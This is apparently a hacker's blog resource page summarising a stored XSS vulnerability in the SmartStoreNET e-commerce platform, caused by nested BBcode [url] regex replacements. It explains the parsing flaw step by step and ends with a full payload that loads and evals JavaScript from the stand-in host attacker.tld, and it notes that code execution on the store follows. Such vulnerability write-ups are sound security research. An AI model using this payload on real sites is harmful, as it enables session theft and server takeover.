Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

SmartStoreNET is an open source ECommerce platformt aht is used on Windows Servers. It offers the ability to host an online business, blogs, forums and much more. With how popular this is, vulnerabilities found in this would be huge.

BBcode is a lightweight markup language used to format messages in many Internet forum software that; a similar technology to Markdown. The BBcode is translated using regular expressions; but, a large amount of the content, such as < is translated into the HTML encoded version.

While parsing links with a format of [text](https://some_url.com) format, the URL portion is removed from the link and placed into an anchors href attribute. Again, this is done through a very simple regex replace call.

Because of the previous escaping steps, it was not possible to use a single or double quote to escape the HTML. However, there are TWO regex patterns that are checked for back-to-back. Making the regex place happen multiple times could cause major parsing issues.

The first regex checks for data of the format [url=http://www.smartstore.com]my site[/url] and puts it into a standard link. After this, another transformation is done on BBcode of type [url]http://www.smartstore.com[/url].

On the first regex, the parameter [url=myAttribute=myValue x=] is used to trigger the first regex. This transformation puts an href, with the value put above (which is not a URL at all). It should be noted that this is the inner link.

On the second replace, it sees the transformed value above as a link, since they are nested. Even though we have already escaped the first one, it believes that this is a link that needs to be replaced with the second regex. When this happens, there is an unexpected amount of quotes already in the link. As a result, the already added links first double quote escapes the string! This allows for the adding of an arbitrary attribute with an arbitrary value!

The progression is shown below:

1. Original payload: [url]foo[url=myAttribute=myValue x=]bar[/url]xyz[/url]
2. After first regex replace: [url]foo<a href="myAttribute=myValue x=" >bar</a>xyz[/url]. Notice that the original format has been replaced with an anchor tag.
3. Second regex place: <a href="foo<a href="myAttribute=myValue x=" >bar</a>xyz</a>.

The important action is that the second regex replace, which puts an object with double quotes into the href. This allows for the escaping which eventually leads to XSS!

The XSS was not simple to trigger though; only attributes can be added to the <a> tag and there is a limit on the characters that can be used for this, from the filtering done prior. To exploit this, they choose to use a style attribute. They added an animation, that, when rendered, would make a web request and eval the data from the request.

The full payload looked like this: [url] [url=style=animation-name:fa-spin; onwebkitanimationend=$.get(`http://attacker.tld/x.js`,function(_){eval(_)}) x=] [/url] [/url]. At this point, code execution is trivial by adding a custom plugin to the store. Game over!

Overall, this was an interesting XSS bug that required a break in the parsing of weird BBcode. To patch this, an additional level of sanitization happened at the end of the processing chain.